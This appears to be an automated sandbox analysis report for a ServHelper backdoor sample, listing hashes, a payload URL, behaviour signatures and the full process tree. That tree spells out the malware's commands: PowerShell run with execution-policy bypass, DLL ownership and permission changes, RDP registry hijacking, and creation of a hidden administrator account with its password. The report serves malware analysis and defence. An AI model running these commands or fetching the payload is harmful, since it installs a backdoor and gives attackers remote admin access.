Analysis
-
max time kernel
144s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
29-03-2024 11:44
Static task
static1
Behavioral task
behavioral1
Sample
211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe
Resource
win10v2004-20231215-en
General
-
Target
211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe
-
Size
5.7MB
-
MD5
211ca7c8d5fd20f7dcaebdbe354662be
-
SHA1
1111e864f3e9d2e6879c5179c4136638b05b67c9
-
SHA256
aefb4a2472f0517d58cae7e5e0c9c51b4e36b39f6096dbffc6b8cc18d0be7175
-
SHA512
d7e6e638cdfd4792a09d671f4e61de715a63a9001283594e6c73d5a88dfc8b91d201fc19b1228b7b1a654f9abb8cf52893d3cc02aea142a1c5c7b9d3f876e24f
-
SSDEEP
49152:sr/U2Wrb/T/vO90dL3BmAFd4A64nsfJ1gBO55+1TEf1q7NOVuZnsm/QBrkdL+DLk:srDnOOWmAQQQQQQQQQQQQQ
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 7 IoCs
Processes:
powershell.exeflow pid process 25 3920 powershell.exe 28 3920 powershell.exe 31 3920 powershell.exe 35 3920 powershell.exe 37 3920 powershell.exe 39 3920 powershell.exe 41 3920 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exepid process 3152 icacls.exe 1084 icacls.exe 3172 icacls.exe 4660 icacls.exe 3648 icacls.exe 2268 takeown.exe 4208 icacls.exe 4344 icacls.exe -
Sets DLL path for service in the registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 4444 4444 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 4660 icacls.exe 3648 icacls.exe 2268 takeown.exe 4208 icacls.exe 4344 icacls.exe 3152 icacls.exe 1084 icacls.exe 3172 icacls.exe -
Processes:
resource yara_rule C:\Windows\Branding\mediasrv.png upx C:\Windows\Branding\mediasvc.png upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe -
Drops file in Windows directory 18 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\shellbrd powershell.exe File opened for modification C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7F13.tmp powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7F34.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_n53vzy1y.wsy.ps1 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ueazsxbf.vnf.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7F24.tmp powershell.exe File opened for modification C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7F45.tmp powershell.exe File opened for modification C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7F56.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 0deb0d6e8a2fda01 powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 28 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 31 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) 1 -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2104 powershell.exe 2104 powershell.exe 3168 powershell.exe 3168 powershell.exe 4932 powershell.exe 4932 powershell.exe 4580 powershell.exe 4580 powershell.exe 2104 powershell.exe 2104 powershell.exe 2104 powershell.exe 3920 powershell.exe 3920 powershell.exe 3920 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 656 656 -
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 2104 powershell.exe Token: SeDebugPrivilege 3168 powershell.exe Token: SeDebugPrivilege 4932 powershell.exe Token: SeDebugPrivilege 4580 powershell.exe Token: SeRestorePrivilege 4344 icacls.exe Token: SeAssignPrimaryTokenPrivilege 1464 WMIC.exe Token: SeIncreaseQuotaPrivilege 1464 WMIC.exe Token: SeAuditPrivilege 1464 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1464 WMIC.exe Token: SeIncreaseQuotaPrivilege 1464 WMIC.exe Token: SeAuditPrivilege 1464 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1232 WMIC.exe Token: SeIncreaseQuotaPrivilege 1232 WMIC.exe Token: SeAuditPrivilege 1232 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1232 WMIC.exe Token: SeIncreaseQuotaPrivilege 1232 WMIC.exe Token: SeAuditPrivilege 1232 WMIC.exe Token: SeDebugPrivilege 3920 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 2044 wrote to memory of 2104 2044 211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe powershell.exe PID 2044 wrote to memory of 2104 2044 211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe powershell.exe PID 2104 wrote to memory of 1688 2104 powershell.exe csc.exe PID 2104 wrote to memory of 1688 2104 powershell.exe csc.exe PID 1688 wrote to memory of 4372 1688 csc.exe cvtres.exe PID 1688 wrote to memory of 4372 1688 csc.exe cvtres.exe PID 2104 wrote to memory of 3168 2104 powershell.exe powershell.exe PID 2104 wrote to memory of 3168 2104 powershell.exe powershell.exe PID 2104 wrote to memory of 4932 2104 powershell.exe powershell.exe PID 2104 wrote to memory of 4932 2104 powershell.exe powershell.exe PID 2104 wrote to memory of 4580 2104 powershell.exe powershell.exe PID 2104 wrote to memory of 4580 2104 powershell.exe powershell.exe PID 2104 wrote to memory of 2268 2104 powershell.exe takeown.exe PID 2104 wrote to memory of 2268 2104 powershell.exe takeown.exe PID 2104 wrote to memory of 4208 2104 powershell.exe icacls.exe PID 2104 wrote to memory of 4208 2104 powershell.exe icacls.exe PID 2104 wrote to memory of 4344 2104 powershell.exe icacls.exe PID 2104 wrote to memory of 4344 2104 powershell.exe icacls.exe PID 2104 wrote to memory of 3152 2104 powershell.exe icacls.exe PID 2104 wrote to memory of 3152 2104 powershell.exe icacls.exe PID 2104 wrote to memory of 1084 2104 powershell.exe icacls.exe PID 2104 wrote to memory of 1084 2104 powershell.exe icacls.exe PID 2104 wrote to memory of 3172 2104 powershell.exe icacls.exe PID 2104 wrote to memory of 3172 2104 powershell.exe icacls.exe PID 2104 wrote to memory of 4660 2104 powershell.exe icacls.exe PID 2104 wrote to memory of 4660 2104 powershell.exe icacls.exe PID 2104 wrote to memory of 3648 2104 powershell.exe icacls.exe PID 2104 wrote to memory of 3648 2104 powershell.exe icacls.exe PID 2104 wrote to memory of 4368 2104 powershell.exe reg.exe PID 2104 wrote to memory of 4368 2104 powershell.exe reg.exe PID 2104 wrote to memory of 976 2104 powershell.exe reg.exe PID 2104 wrote to memory of 976 2104 powershell.exe reg.exe PID 2104 wrote to memory of 2336 2104 powershell.exe reg.exe PID 2104 wrote to memory of 2336 2104 powershell.exe reg.exe PID 2104 wrote to memory of 3356 2104 powershell.exe net.exe PID 2104 wrote to memory of 3356 2104 powershell.exe net.exe PID 3356 wrote to memory of 428 3356 net.exe net1.exe PID 3356 wrote to memory of 428 3356 net.exe net1.exe PID 2104 wrote to memory of 3384 2104 powershell.exe cmd.exe PID 2104 wrote to memory of 3384 2104 powershell.exe cmd.exe PID 3384 wrote to memory of 3656 3384 cmd.exe cmd.exe PID 3384 wrote to memory of 3656 3384 cmd.exe cmd.exe PID 3656 wrote to memory of 1368 3656 cmd.exe net.exe PID 3656 wrote to memory of 1368 3656 cmd.exe net.exe PID 1368 wrote to memory of 336 1368 net.exe net1.exe PID 1368 wrote to memory of 336 1368 net.exe net1.exe PID 2104 wrote to memory of 3772 2104 powershell.exe cmd.exe PID 2104 wrote to memory of 3772 2104 powershell.exe cmd.exe PID 3772 wrote to memory of 4636 3772 cmd.exe cmd.exe PID 3772 wrote to memory of 4636 3772 cmd.exe cmd.exe PID 4636 wrote to memory of 4948 4636 cmd.exe net.exe PID 4636 wrote to memory of 4948 4636 cmd.exe net.exe PID 4948 wrote to memory of 640 4948 net.exe net1.exe PID 4948 wrote to memory of 640 4948 net.exe net1.exe PID 1648 wrote to memory of 2880 1648 cmd.exe net.exe PID 1648 wrote to memory of 2880 1648 cmd.exe net.exe PID 2880 wrote to memory of 1900 2880 net.exe net1.exe PID 2880 wrote to memory of 1900 2880 net.exe net1.exe PID 4480 wrote to memory of 4056 4480 cmd.exe net.exe PID 4480 wrote to memory of 4056 4480 cmd.exe net.exe PID 4056 wrote to memory of 2120 4056 net.exe net1.exe PID 4056 wrote to memory of 2120 4056 net.exe net1.exe PID 3660 wrote to memory of 4372 3660 cmd.exe net.exe PID 3660 wrote to memory of 4372 3660 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nvb2al1r\nvb2al1r.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES515C.tmp" "c:\Users\Admin\AppData\Local\Temp\nvb2al1r\CSC3B066624B2AE420C8E6B3E287BE0BE1.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Sets DLL path for service in the registry
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc rbAwK2ZR /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc rbAwK2ZR /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc rbAwK2ZR /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" GAWKBMOT$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" GAWKBMOT$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GAWKBMOT$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc rbAwK2ZR1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc rbAwK2ZR2⤵
-
